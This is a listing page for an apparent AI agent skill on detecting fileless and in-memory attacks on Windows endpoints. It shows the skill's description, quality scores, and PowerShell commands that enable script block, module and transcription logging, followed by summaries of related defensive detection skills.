detecting-fileless-attacks-on-endpoints

Featured

Detects fileless malware and in-memory attacks that execute entirely in RAM without writing persistent files to disk, evading traditional antivirus. Use when building detections for PowerShell-based attacks, reflective DLL injection, WMI persistence, and registry-resident malware. Activates for requests involving fileless malware detection, in-memory attacks, PowerShell exploitation, or living-off-the-land techniques.

AI & Automation 12,642 stars 1468 forks Updated today Apache-2.0

Install

View on GitHub

Quality Score: 99/100

Stars 20%
100
Recency 20%
100
Frontmatter 20%
70
Documentation 15%
100
Issue Health 10%
50
License 10%
100
Description 5%
100

Skill Content

# Detecting Fileless Attacks on Endpoints ## When to Use Use this skill when: - Building detection rules for fileless malware that operates entirely in memory - Hunting for PowerShell-based attacks, reflective DLL injection, and WMI abuse - Configuring endpoint telemetry (Sysmon, AMSI, PowerShell logging) to capture fileless indicators - Investigating incidents where traditional AV found no malicious files **Do not use** for detecting file-based malware or for malware reverse engineering. ## Prerequisites - Sysmon with process creation and WMI event logging enabled - PowerShell Script Block Logging and Module Logging enabled - AMSI (Antimalware Scan Interface) enabled for script content inspection - EDR with behavioral detection capabilities (MDE, CrowdStrike, SentinelOne) ## Workflow ### Step 1: Enable Required Telemetry ```powershell # Enable PowerShell Script Block Logging (GPO or registry) New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" ` -Name EnableScriptBlockLogging -Value 1 -PropertyType DWORD -Force # Enable PowerShell Module Logging New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging" ` -Name EnableModuleLogging -Value 1 -PropertyType DWORD -Force # Enable PowerShell Transcription New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription" ` -Name EnableTranscripting -Value 1 -PropertyType DWORD -Force # Sysmon config for fileless ...

Details

Author
mukul975
Repository
mukul975/Anthropic-Cybersecurity-Skills
Created
3 months ago
Last Updated
today
Language
Python
License
Apache-2.0

Similar Skills

Semantically similar based on skill content — not just same category

AI & Automation Featured

detecting-fileless-malware-techniques

Detects and analyzes fileless malware that operates entirely in memory using PowerShell, WMI, .NET reflection, registry-resident payloads, and living-off-the-land binaries (LOLBins) without writing traditional executable files to disk. Activates for requests involving fileless threat detection, in-memory malware investigation, LOLBin abuse analysis, or WMI persistence examination.

12,642 Updated today
mukul975
AI & Automation Featured

detecting-evasion-techniques-in-endpoint-logs

Detects defense evasion techniques used by adversaries in endpoint logs including log tampering, timestomping, process injection, and security tool disabling. Use when investigating suspicious endpoint behavior, building detection rules for evasion tactics, or conducting threat hunting for stealthy adversary activity. Activates for requests involving evasion detection, defense evasion analysis, log tampering detection, or MITRE ATT&CK TA0005.

12,642 Updated today
mukul975
AI & Automation Featured

detecting-suspicious-powershell-execution

Detect suspicious PowerShell execution patterns including encoded commands, download cradles, AMSI bypass attempts, and constrained language mode evasion.

12,642 Updated today
mukul975
AI & Automation Featured

performing-lateral-movement-detection

Detects lateral movement techniques including Pass-the-Hash, PsExec, WMI execution, RDP pivoting, and SMB-based spreading using SIEM correlation of Windows event logs, network flow data, and endpoint telemetry mapped to MITRE ATT&CK Lateral Movement (TA0008) techniques.

12,642 Updated today
mukul975
AI & Automation Featured

detecting-living-off-the-land-attacks

Detect abuse of legitimate Windows binaries (LOLBins) used for living off the land attacks. Monitors process creation, command-line arguments, and parent-child relationships to identify suspicious LOLBin execution patterns.

12,642 Updated today
mukul975